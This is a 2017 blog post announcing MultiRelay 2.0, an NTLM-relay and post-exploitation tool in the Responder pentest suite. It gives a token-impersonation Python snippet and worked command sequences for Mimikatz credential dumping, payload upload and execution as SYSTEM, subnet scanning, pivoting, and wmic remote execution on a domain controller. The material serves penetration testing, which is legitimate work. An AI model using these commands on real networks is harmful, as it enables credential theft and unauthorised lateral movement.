Friday, March 31, 2017

MultiRelay 2.0: Runas, Pivot, SVC, and Mimikatz Love.


Introduction:

If you haven't read the initial MultiRelay introduction post, I strongly invite you to read it.

MultiRelay Description:

MultiRelay 2.0 is a powerful -professional grade- pentest utility included in Responder's tools folder, giving you the ability to perform targeted NTLMv1 and NTLMv2 relay and post exploitation on a selected target.

 New Functionalities:

Several new functionalities were added to the MultiRelay shell interface, those are listed below:
  • Upload a file on the target:
    Using the "upload" command, a user can push any file using the SMB protocol on the compromised target. The file will be uploaded in c:\Windows\Temp\
  • Delete a file on the target:
    Using the "delete" command, a user can delete any file using the SMB protocol on the compromised target. If the file has been successfully deleted, no errors will be shown.
  • Run a command as the currently logged in user:
    Using the "runas" command, a user will be able to launch a service which will run a command as the currently logged in user.
  • Pivot to another host, using the currently logged in user's sets of credentials.
    Using the "pivot" command, a user will attempt to propagate to another host (Lateral movement).
  • Run remote Mimikatz (32-bit, 64-bit) RPC commands:
    Using the "mimi" or "mimi32" command, the user will be able to interact with mimikatz RPC on the target.
  • Scan the current /24 or /16  in order to find other hosts to pivot to:
    When using the "scan /24" command, a user will be able to scan the entire class C and chose another host to pivot to.
  • Run a local command on the local system:
    Any other command will launch a service which will run a command as LocalSystem.

Since the previous version 2 new options were added:
  • -c Run a command as system then exit (scripting).
     
  • -d Dump the SAM database then exit (scripting).

Good Things To Know:

  • All binaries used by MultiRelay are stored in ./tools/MultiRelay/bin/
     
  • Filenames for these binaries are specified in MultiRelay.py, starting at line 48:
    MimikatzFilename    = "./MultiRelay/bin/mimikatz.exe"
    Mimikatzx86Filename = "./MultiRelay/bin/mimikatz_x86.exe"
    RunAsFileName       = "./MultiRelay/bin/Runas.exe"
    SysSVCFileName      = "./MultiRelay/bin/Syssvc.exe"
  • Any binaries can be replaced with your own, simply make sure to change the name accordingly in MultiRelay.py.
  • The upload local path is ./tools/. If you put your payloads in ./tools/MultiRelay/, you'll have to run: upload MultiRelay/custompayload.exe. Best is to provide the full path.
  • If you have some sets of credentials, you can use MultiRelay without relaying an NTLM hash. On one screen point MultiRelay to your target and on another one run: smbclient -U user%password -W domain //Your_IP/c$
  • Think about the command you're about to launch before launching it. Uploading your custom version of mimikatz and running "mimikatz" will keep the process hanging and you wont be able to delete the file unless you're using taskkill /F /IM file.exe. For custom mimikatz command usage with MultiRelay, please refer to the MultiRelay 2.0 Wushu section.

NTLM Relay Lateral Movement:

MultiRelay philosophy is that any successful NTLM Relay is precious and everything should be done to keep that SMB connection alive.

Getting command execution via NTLM Relay is commonly achieved via SVCCTL:
  • Open IPC$ named pipe \SVCCTL -> create a service with your command -> start the service -> get the output -> done.
While running commands as SYSTEM is cool, you can't do much on the network with this user, meaning that you cannot access other network resources with a local system account.
This limits the compromise to only one host at the time, and you might wait a long time before another administrator hash flies over the wire...
While building MultiRelay 1.0, I thought it would be nice to execute commands as the currently logged in user in the next version and have the ability to pivot across the network. When I started to work on MultiRelay 2.0 I made a 5 lines python script (Runas.py) which impersonate a logged in user:

import sys, win32ts, win32process, win32con

SessionID = win32ts.WTSGetActiveConsoleSessionId()
UserToken = win32ts.WTSQueryUserToken(SessionID)
h,tn,pi,ti = win32process.CreateProcessAsUser(UserToken, "c:\\Windows\\system32\\cmd.exe", "/c "+' '.join(sys.argv[1:]), None, None, True, win32con.NORMAL_PRIORITY_CLASS, None, None, win32process.STARTUPINFO())

As stated in WTSGetActiveConsoleSessionId MSDN documentation
WTSGetActiveConsoleSessionId "Retrieves the session identifier of the console session. The console session is the session that is currently attached to the physical console. Note that it is not necessary that Remote Desktop Services be running for this function to succeed".
Once we have the session ID, we use the WTSQueryUserToken function to retrieve the Token associated with the previously acquired Session ID, and call
CreateProcessAsUser with our command.
In short, we're able to impersonate any logged in user and re-use their credentials and resource access across the network. This opens a whole new kind NTLM Relay attack vector: Propagation and mass compromises resulting from 1 relayed authentication.

Teaming up with @gentilkiwi:

Earlier versions of MultiRelay used this python script compiled with pyinstaller which generated a pretty big file from a 5 python lines script... @gentilkiwi jumped in and said "I think I can do way better", and he did.
@gentilkiwi developed a custom mimikatz RPC server, added more token impersonation options, the ability to run mimikatz as a service and he also took care of bringing Runas.exe to a decent size of 9k while I was working on Mimikatz RPC client and all the other MultiRelay functionalities.

These new Mimikatz functionalities allows MultiRelay to interact stealthily with Mimikatz and use without restriction all of the power this awesome tool gives us.

 

MultiRelay 2.0 Wushu:

Below are listed some post exploitation attack examples:
  • Mimikatz RPC:
    Get all available token, impersonate one user and run a command as this user:
    • C:\Windows\system32\:#mimi token::list 
    • C:\Windows\system32\:#mimi token::run /user:User_To_Impersonate /process:Command_To_Run
    • C:\Windows\system32\:#mimi token::run /user:Administrator /process:whoami
    Get all logon passwords:
    • mimi sekurlsa::logonpasswords
    Etc, all regular mimikatz commands are available on the RPC interface
  • Upload your custom mimikatz or payload and run it:
    Upload an executable and launch it from Windows/Temp/ as system.
    • C:\Windows\system32\:#upload path/to/mimikatz.exe
    • C:\Windows\system32\:#%windir%\Temp\mimikatz.exe "sekurlsa::logonpasswords" exit 
    The exit command is very important with mimikatz, if you don't use it mimikatz will stay loaded and the command will fail.
    Note: If you need to run your executable as the currently logged in user, use:
    • C:\Windows\system32\:#runas %windir%\Temp\Filename.exe args
    Now delete the file:
    • C:\Windows\system32\:#delete /Windows/Temp/mimikatz.exe
       
  • Scan the current class C and pivot to another host:
    • C:\Windows\system32\:#scan /24
      ...[snip]...
      ['192.168.1.141', Os:'Windows Server 2016 Standard 14393', Domain:'SMB3', Signing:'True']
      ['192.168.1.142', Os:'Windows Server 2012 R2 Datacenter 9600', Domain:'SMB3', Signing:'False']
      ['192.168.1.144', Os:'Windows 5.1', Domain:'SMB3', Signing:'False']
      ['192.168.1.145', Os:'Windows Server 2012 R2 Datacenter 9600', Domain:'SMB3', Signing:'False']
      ...[snip]...
    •  C:\Windows\system32\:#pivot 192.168.1.145
      [+] Pivoting to 192.168.1.145.
      Connected to 192.168.1.145 as LocalSystem.
  • Run a command as the currently logged in user:
    • C:\Windows\system32\:#runas whoami
      smb3\lgandx 
  • Execute commands on the PDC remotely and read the output:
    • Mount the PDC C:\ drive:
    • C:\Windows\system32\:#runas net use g: \\smb3.local\c$
      The command completed successfully.
    • C:\Windows\system32\:#runas wmic /node:smb3.local process call create "cmd /c whoami^>c:\results.txt"
      Executing (Win32_Process)->Create()
      Method execution successful.
      Out Parameters:
      instance of __PARAMETERS
      {
      ProcessId = 1068;
      ReturnValue = 0;
      };
    • Note: When using special DOS characters with wmic, they need to be escaped with a ^. Example: whoami^>c:\results.txt
    • C:\Windows\system32\:#runas more g:\results.txt
      smb3\lgandx

    These are just a few examples of what MultiRelay allows you to accomplish on a Windows active directory environment, for the rest it's up to your imagination.

Final Words: The donation campaign

I work as an independent contractor/pentester and I get pretty busy these days. When I work on Responder, I end up working for free for the community and losing money I could make with my contracts, especially when a set of new functionalities or research takes up to a month, full time.
 
Therefore a donation campaign was launched a few month ago in order to get some funding for this project, and I think it was a success. More than 50 pentesters around the world and 3 companies donated to this project, therefore supporting the development of this set of free tools used in your everyday internal pentests.

I would like to thank all the independent penetration testers who donated and these 3 companies:
And all, ALL the pentesters around the world who donated to this project.
Your donations made this version happen.
Oh, I almost forgot, you can download Responder and MultiRelay 2.0 here:
https://github.com/lgandx/Responder

Happy hacking!